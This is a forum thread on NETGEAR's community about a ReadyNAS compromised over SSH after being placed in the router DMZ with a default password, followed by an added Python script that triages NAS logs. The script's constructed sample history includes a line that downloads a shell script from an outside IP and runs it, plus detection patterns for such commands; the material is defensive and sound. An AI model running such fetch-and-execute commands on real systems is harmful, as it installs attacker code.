IanWilson (Aspirant), Jan 10, 2015
Can a 314 ReadyNAS get hacked?
I am really worried:
A few days ago I had to have tech support on my brand new 314 ReadyNAS. I was asked for my password by the online tech and left it in tech support mode for 12 hours until the problem (an uninstalled app which broke the OS 6.2.2 web admin dashboard due to the current firmware bug) was fixed. Afterwards I noticed that several services I had running before had been left on, including the SSH service.
For the last two days my DSL router keeps getting maxed out and falls over especially in the mornings. Its logging is poor and I can't identify the exact culprit but I do know that unplugging the readynas from the network fixes the problem. Also if I firewall the readynas so it can't communicate outbound that helps as well.
Is it possible my NAS is being attacked or hacked? I am on a static WAN IP and have to use that DSL router - I have no choice due to provider.
Any ideas?
I notice since plugging it in the performance screen shows some disc operations and network activity present, yet when disconnected but left turned on the activity falls to nothing. Is it normal for a readynas to have activity when you think nothing on the LAN is using it?
I turned ReadyCLOUD, Remote, Replicate and SSH off for now.
33 Replies
- IanWilson (Aspirant): Kindly, mdgm has contacted me to tell me I AM hacked... It looks like they got in via SSH when I briefly dropped my firewall protection to the unit... Going to try a factory reset when time allows, after backing up all items again.
- alexofindy (Aspirant): Could mdgm or someone else post a bit more information on how a ReadyNAS was hacked? Even if one does not enable port forwarding via one's router, but has run the toggleSSH plugin for its intended purpose (allowing NETGEAR tech support to access a system), does this leave a ReadyNAS vulnerable? If tech support can gain access without port forwarding, I would imagine someone with less honorable intentions might be able to access a system as well (I'm no expert).
Also, even if one did everything wrong and enabled root SSH and did have port forwarding on a router, wouldn't a strong password be protective?
What sort of hacking is taking place? Is there a malware package designed to affect the ReadyNAS out there we should know about? How does one check the integrity of one's system?
- mdgm-ntgr (NETGEAR Employee Retired): The Toggle SSH add-on for legacy NAS units has a password specific to the system (unless Enable Root SSH has been installed previously). The hacker would need some knowledge of the system they are targeting to hack into it, so it is unlikely. The Toggle SSH add-on is not what was used here.
These days tech support accesses systems without requiring port forwarding. A secure connection is made back to a NETGEAR server which only NETGEAR support and ReadyNAS Product engineering can access.
Root SSH with a strong password would provide some protection but wouldn't guarantee a system wouldn't be hacked. Do remember that when an OS Re-install is done the password is reset to the default one which would leave you exposed if port forwarding is active till you change the password again.
Usually if a NAS gets hacked it is because SSH is forwarded and the default password is set. This is true for every NAS vendor which has SSH as a feature.
The NAS runs Debian with some customisations. There are different kinds of malware out there including some that can lead to data loss.
It is important that you backup your important data regularly and that you don't forward ports to your NAS that you don't need to.
To check the integrity of your system you'd look in e.g. processes.log for processes that shouldn't be there, systemd-journal.log for suspicious entries, the bash_history.log for suspicious entries and in other logs.
- IanWilson (Aspirant): I must stress the error of my ways:
I had need to set my NAS to tech support mode. Thinking I was being helpful, I set my router's DMZ feature to point at the NAS, thereby dropping the firewall protecting the NAS. My thought process was that I didn't want anything to obstruct the tech support staff from doing their job. I presume that at some point in the process of engaging the tech support mode, the box reverts its password back to the default, and there you go: open access via SSH with the known default password. My only query and surprise: how did someone know which WAN IP address to target? My address is static but we have only had it 6 weeks total, since our service provider changed a batch over apparently.
I admit I am a complete idiot, but only through a lack of understanding. If I'd known that access was fine without any port forwarding for sure, I probably wouldn't have ever dropped the firewall.
The main thing that made me realise there was something amiss was on the admin dashboard. The performance screen showed a lot of network activity (mainly Tx) onto the LAN from the ReadyNAS when no device was accessing it on the LAN. My router kept falling over and the LAN was unusable. Unplugging the NAS fixed the problem each time. My suspicions it was the NAS grew.
I must say a big big thank you to mdgm who has helped get to the bottom of the issue and has helped by having someone inspect my logs. I'm not a complete newbie to these things but I am not an IT professional and I would have been a bit stuck without his invaluable help.
- Danthem (NETGEAR Employee Retired):
IanWilson wrote: how did someone know which WAN IP address to target? My address is static but we have only had it 6 weeks total since our service provider changed a batch over apparently.
There are crawlers scanning through public IPs, trying to connect to port 22 and then various different passwords. Some of them are specifically looking for ReadyNAS devices with the tech support password... It's why we very rarely, and only as a last resort, recommend device access through port forwarding.
- IanWilson (Aspirant): That's frightening to think of really. For those doing remote backups (I was going to use my old NAS to do this from my office), does rsync over SSH require port 22 to be opened up, putting users at risk? (or just port 873?)
Maybe a little off topic but relevant to hacking: I have been doing some reading on IPv6 (wondering what on earth that was!) and it strikes me that each piece of equipment in the world having its own WAN address is going to make it even easier for things like a crawler to cause mayhem. I wonder if it is worth disabling IPv6 - most home LANs are not likely to benefit.
- StephenB (Guru - Experienced User):
IanWilson wrote: ...I wonder if it is worth disabling IPv6 - most home LANs are not likely to benefit.
Well, the security needs to be maintained in your edge router with both IPv4 and IPv6. It is easy enough for the router to deny unsolicited inbound connections for IPv6, the same as it does for IPv4. So I think your security concerns are overstated.
The simple answer is that if your ISP is giving you an IPv6 address you should have IPv6 enabled on your home network as well.
If your ISP is not giving you an IPv6 WAN address, then there is no reason to enable it in the router.
- IanWilson (Aspirant): Thanks Stephen - that's helpful to know. I disabled it at present but will investigate with an online native IPv6 checker tool sometime. The router's firewall does not state anything about IPv4 or 6, so I presume any rules applied are applied to both.
- alexofindy (Aspirant): I sure would like additional information about what sort of hacking is going on.
I don't have port forwarding enabled, and I use strong passwords.
But I did have to enable root SSH to troubleshoot share and file permission problems I had when I began backing up an Ultra 6+ to a 316 using rsync; the problem turned out to be the differing UIDs for standard accounts on the two systems (thanks again to those on the forum who helped me solve this!) but I needed shell access to track it down. I've run toggle-ssh to disable SSH, but one can't fully reverse the effects of the enable root SSH plugin without doing a factory default. Is this a security problem?
My nightmare scenario, if you will, is coming home and finding that a Linux-NAS version of Cryptowall has encrypted all my files, as well as the copies on my connected backups.
And, I'd hate for someone to start transferring copies of all my data to a server in Antarctica.
So, any available information on "known" malware that can affect a ReadyNAS would be appreciated.
- mdgm-ntgr (NETGEAR Employee Retired): If you try SSHing into your NAS now that you've disabled SSH, what response do you get?
Well, there has to be some way that a hacker was able to get at the NAS. You had it on DMZ.
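The checks the NETGEAR staff describe in this thread (mdgm's advice to look through processes.log, systemd-journal.log and bash_history.log for things that shouldn't be there, Danthem's point that crawlers hammer port 22 with password guesses, and mdgm's closing suggestion to try SSHing in to confirm the service is really off) can be turned into a small triage script. The following is an added example written for this page, not NETGEAR code and not anything from the poster's NAS. The three log excerpts are constructed samples in the shape of those files, using invented PIDs, commands and documentation-range addresses; the file names, thresholds and the "binary running out of /tmp" heuristic are the example's own assumptions.

```python
"""Triage a suspected ReadyNAS (Debian) compromise from its log bundle.
Added example for the forum thread above; the sample logs below are constructed
(invented PIDs, commands and documentation-range IPs), not real NAS data."""
import re
import socket
from collections import Counter
from ipaddress import ip_address, ip_network

# Constructed excerpt in the shape of systemd-journal.log (sshd auth lines).
SYSTEMD_JOURNAL_LOG = """\
Jan 08 03:12:01 nas sshd[2210]: Failed password for root from 198.51.100.23 port 51822 ssh2
Jan 08 03:12:04 nas sshd[2210]: Failed password for root from 198.51.100.23 port 51822 ssh2
Jan 08 03:12:09 nas sshd[2213]: Accepted password for root from 198.51.100.23 port 51830 ssh2
Jan 08 03:13:40 nas sshd[2240]: Failed password for invalid user pi from 198.51.100.77 port 40001 ssh2
Jan 08 09:40:11 nas sshd[3001]: Accepted publickey for admin from 192.168.1.20 port 40122 ssh2
"""
# Constructed excerpt in the shape of processes.log (ps-style listing).
PROCESSES_LOG = """\
USER       PID %CPU %MEM COMMAND
root         1  0.0  0.1 /sbin/init
root       912  0.0  0.2 /usr/sbin/sshd -D
root      1301  0.1  0.5 /usr/sbin/apache2 -k start
root      4120 97.3  1.2 /tmp/.x/syncd -c /tmp/.x/cfg
"""
# Constructed excerpt in the shape of bash_history.log.
BASH_HISTORY_LOG = """\
ls /data
cd /tmp
wget -q http://203.0.113.9/x.sh -O /tmp/.x/x.sh
chmod +x /tmp/.x/x.sh
nohup /tmp/.x/x.sh &
"""

SSHD_RE = re.compile(r"sshd\[\d+\]: (?P<result>Accepted|Failed) \S+ for (?:invalid user )?"
                     r"(?P<user>\S+) from (?P<ip>\S+) port \d+")
# Addresses that can only originate on the LAN side of a home router.
LAN_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                                    "127.0.0.0/8", "169.254.0.0/16", "fc00::/7",
                                    "fe80::/10", "::1/128")]
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")   # assumed: no real service lives here
HISTORY_RE = re.compile(r"\b(wget|curl|nohup|chmod \+x)\b|/tmp/|\| *(ba)?sh\b")


def from_lan(ip: str) -> bool:
    """True when the source address belongs to a LAN/loopback range."""
    addr = ip_address(ip)
    return any(addr in net for net in LAN_NETS)


def ssh_events(journal: str):
    """Yield (result, user, ip) for every sshd authentication line."""
    for line in journal.splitlines():
        m = SSHD_RE.search(line)
        if m:
            yield m["result"], m["user"], m["ip"]


def outside_logins(journal: str):
    """Successful SSH logins from outside the LAN: on a home NAS any hit is a finding."""
    return [(u, ip) for r, u, ip in ssh_events(journal) if r == "Accepted" and not from_lan(ip)]


def brute_force_sources(journal: str, threshold: int = 2):
    """Sources with >= threshold failed logins, the crawler pattern Danthem describes."""
    fails = Counter(ip for r, _, ip in ssh_events(journal) if r == "Failed")
    return {ip: n for ip, n in fails.items() if n >= threshold}


def scratch_dir_processes(processes: str):
    """Commands whose executable lives in a scratch directory (header line skipped)."""
    return [cmd for cmd in (l.split(None, 4)[-1] for l in processes.splitlines()[1:])
            if cmd.startswith(SCRATCH_DIRS)]


def suspicious_history(history: str):
    """History lines that look like fetching, marking executable and launching a payload."""
    return [l for l in history.splitlines() if HISTORY_RE.search(l)]


def port_state(host: str, port: int, timeout: float = 2.0) -> str:
    """'open', 'closed' (connection refused) or 'filtered' (no answer) for host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"
    except OSError:
        return "filtered"


def triage(journal=SYSTEMD_JOURNAL_LOG, processes=PROCESSES_LOG, history=BASH_HISTORY_LOG):
    """Run every check; empty lists/dicts mean that check saw nothing."""
    return {"outside_logins": outside_logins(journal),
            "brute_force": brute_force_sources(journal),
            "scratch_processes": scratch_dir_processes(processes),
            "history": suspicious_history(history)}


if __name__ == "__main__":
    for key, val in triage().items():
        print(f"{key}: {val}")
    # After disabling SSH, "closed" or "filtered" from the WAN side is what you want to see.
    print("ssh on this host:", port_state("127.0.0.1", 22))
```

Run it against the real files pulled from the NAS log zip by passing their contents to `triage()`; the constructed defaults only exist so the script runs stand-alone. `port_state()` is the programmatic form of mdgm's "try SSHing in" check and should be run from outside the LAN (or at least against the NAS's LAN address after disabling SSH), since "closed" from the NAS itself says nothing about what the router still forwards.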